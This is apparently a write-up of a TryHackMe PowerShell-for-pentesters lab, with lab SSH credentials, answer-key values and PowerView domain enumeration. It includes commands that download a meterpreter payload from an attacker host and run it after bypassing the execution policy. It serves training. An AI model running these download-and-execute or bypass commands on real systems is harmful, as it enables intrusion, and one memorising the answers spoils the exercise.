# Powershell for Pentesters

This room can be found [here](https://tryhackme.com/room/powershellforpentesters). This section will cover the basics of PowerShell that will be useful in any engagement.

Target machine SSH credentials:

* Username: walter
* Password: Kowacs123!

We can then run `powershell` to access PowerShell.

## Task 1

Most of the command-line portions of pentest training focus on using Linux, but most corporate systems are Windows. So it is important that the Red Team member feels at home in both operating systems.

There are several PowerShell scripts useful in penetration tests, such as PowerView and Nishang, the downside to these and other scripts are they are detected by most AV (antivirus) software.&#x20;

### Question 1: What useful PowerShell script did you find on Walter's desktop?

`powerview.ps1` - `dir` on Walters desktop to see the files

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FUbPbkLLB3q7ZLUg84Ej6%2Fimage.png?alt=media\&token=90494c9d-5098-43ae-9c1e-dd6a87b5180b)

## Task 2

`Start-Process` - Used to start a process, such as notepad.

`Get-Process` - Lists all running processes. Can also be used with the `-name` parameter to filter for a specific process

`(command) | Export-Csv` - Exports the Previously piped command into a .CSV file that may be easier to read.

`Get-Content` - Shows the contents of a file. Similar to the `cat` command on linux.

`Copy-Item` - Copies and item

`Move-Item` - Moves and item

`Get-FileHash` - Obtains file hash of specified file

### Question 1: What is the MD5 hash value of the file on Walter's desktop?

`501570FFBA7FACE69D61DA1A0843E89A` - `Get-FileHash -Algorithm MD5 .\Desktop\powerview.ps1` will give us the&#x20;

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F7H8RWxAVGRiqnvLbte7o%2Fimage.png?alt=media\&token=4927ba79-462b-421d-9b64-1c80cfea7a46)

## Task 3

### Downloading files

There are multiple ways to download files from a server using PowerShell. ***One*** of the quickest ways is using `WebClient` and `DownloadFile`.

* `(New-Object System.Net.WebClient)DownloadFile('URL/File', 'Output-File')`
  * Example: `(New-Object System.Net.WebClient)DownloadFile('http://10.0.2.8/meterpreter-64.ps1', 'meterpreter.ps1')`

This will connect to the  host 10.0.2.8 and download the`meterpreter-64.ps1` file. The file is then saved as “`meterpreter.ps1`”

Another method is by using `Invoke-WebRequest`

* `Invoke-WebRequest "URL/File" -OutFile "File"`
  * `Invoke-WebRequest "http://10.0.2.8/meterpreter-64.ps1" -Outfile "meterpreter.ps1"`

### Execution Policies

Once we have the file downloaded, we can run the file, but we may run into an `ExecutionPolicy` issue. Microsoft has stated *ExecutionPolicy* is NOT a security feature. but it functions as an added safety measure and can be bypassed by the user.

The current state of the ExecutionPolicy configuration can be seen using “`Get-ExecutionPolicy -list`”

Execution policies can have seven different values:

* `AllSigned` - Scripts can run but require all scripts to be signed by a trusted publisher.
* `Bypass` - All scripts can run, and no warnings or prompts will be displayed.
* `Default` - This refers to “restricted” for Windows clients and “RemoteSigned” for Windows servers.
* `RemoteSigned` - Scripts can run, and this does not require local scripts to be digitally signed.
* `Restricted` - The default configuration for Windows clients. Allows individual commands to run, does not allow scripts.
* `Undefined` - This shows that no specific execution policy was set. This means default execution policies will be enforced.
* `Unrestricted` - Most scripts will run.

We several alternatives to bypass the ExecutionPolicy, but some methods require the user to have administrator account privileges. The most common way is:

* `powershell -ExecutionPolicy Bypass -File .\(File)`
  * Example: `powershell -ExecutionPolicy Bypass -File .\meterpreter.ps1`
* `powershell -Exec Bypass -File .\(File)`
  * Example: `powershell -Exec Bypass -File .\meterpreter.ps1`

We can also change the ExecutionPolicy for processes using `Set-ExecutionPolicy Bypass -Scope Process` then attempt to run the file.

## Task 4

* `Get-Hotfix` - Enumerate already installed patches
  * `Get-Hotfix | Format-list | findstr InstalledOn`
  * `Get-Hotfix | Format-Table HotFixID`
* `Format-List` - Used to gather more information about objects
  * `dir | Format-List`
* `Out-File` - Used to save the output to a file for further use
  * `Get-Hotfix | Out-File Hotfixes.txt`

### Question 1: What Windows Security Update was installed on 5/15/2019?

`KB4499728` - `Get-HotFix` can give us our answer

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fnkp0dKcA1fNSmwCYIJXI%2Fimage.png?alt=media\&token=a337fbac-0b1e-4966-abc4-9439896ec154)

## Task 6

PowerView is one of the most effective ways to gather information on the domain. The module can be downloaded from [here](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1).&#x20;

Once we download the file, we will need to bypass the execution policy, then import the module.

`powershell -Exec Bypass .\powerview.ps1`

`Import-Module .\powerview.ps1`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fsuxo56iPiBKgqssYkRu3%2Fimage.png?alt=media\&token=06766c5b-e15b-48ff-9bcc-6690eafc4a1a)

With powerview imported we can use it to obtain information on Domain Configuration and users.

* `Get-NetDomainController` - Collect information on the domain controller
* `Get-NetUser` - Provide a list of domain users. Depending on the size of the company, we may want to output this to a .csv
  * `Get-NetUser | select -ExpandProperty lastlogon` can be used to expand on this command to view the users last logon date/time
* `Get-NetComputer` - Enumerate systems connected to the domain
* `Get-NetGroup` - Enumerate Existing Groups
  * `Get-NetGroupMemer "Domain Admins"` can be used to find group members in the "Domain Admins" group.
* `Find-DomainShare` - Lists available shares
* `Get-NetGPO` - Gather information on enforced policies through Group Policy.
* `Find-LocalAdminAccess` - List systems in the domain you may access as a local administrator

### Question 1: One of the accounts has a special description, what is it?

`IDF-17828290` - `Get-NetUser -properties distinguishedname,cn,sn,description,useraccountcontrol` can give us details. We can ofcourse add additional properties if we find fit.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FS2cNhLRqRuIUGgQwFCx2%2Fimage.png?alt=media\&token=f682cd23-a9b1-478c-90dd-bd2ff33080fd)

### Question 2: How many accounts are disabled?

`4` - Seeing previous screenshot/command we can find our answer.

### Question 3: How many users are in the "domain admins" group?

`3` - `Get-NetGroupMember "Domain Admins"` can give us our answer

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F8hy8nYdY8SmDmc5VCRyS%2Fimage.png?alt=media\&token=ac71db9c-eafd-4864-8248-27c27f499aca)

### Question 4: Which users are in the "domain admins" group?

`usand, ssilk, ServerAdmin` - Previous command and screenshot give us our answer.

### Question 5: List shares, what is the name of the "interesting" share?

`operationfiles` - `Find-DomainShare -CheckShareAccess`, most of these look pretty normal except this one.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FLiwLl84W5LRvNmTlf8gw%2Fimage.png?alt=media\&token=2ed6d8da-2cad-488e-8383-c8d530f5c938)

### Question 6: What is the name of the user-created Group Policy?

`Disable WinDef` - Running `Get-NetGPO -properties displayname` we see the list of Group Policy display names

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FVLcCUDzB1qVm3cGy6dtP%2Fimage.png?alt=media\&token=3ea700dd-9e0d-464d-80fe-9aad1889785e)

### Question 7: What are the first names of users' whose accounts were disabled?

`Daniel, Ursula` -Looking at our previous command, `Get-NetUser -properties distinguishedname,cn,sn,description,useraccountcontrol`,  we can see the first and last name of the users and can see which one are disabled.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FxKJdXQVauXStGyx1PhMe%2Fimage.png?alt=media\&token=172788d5-1a6c-4063-9879-416271c94c42)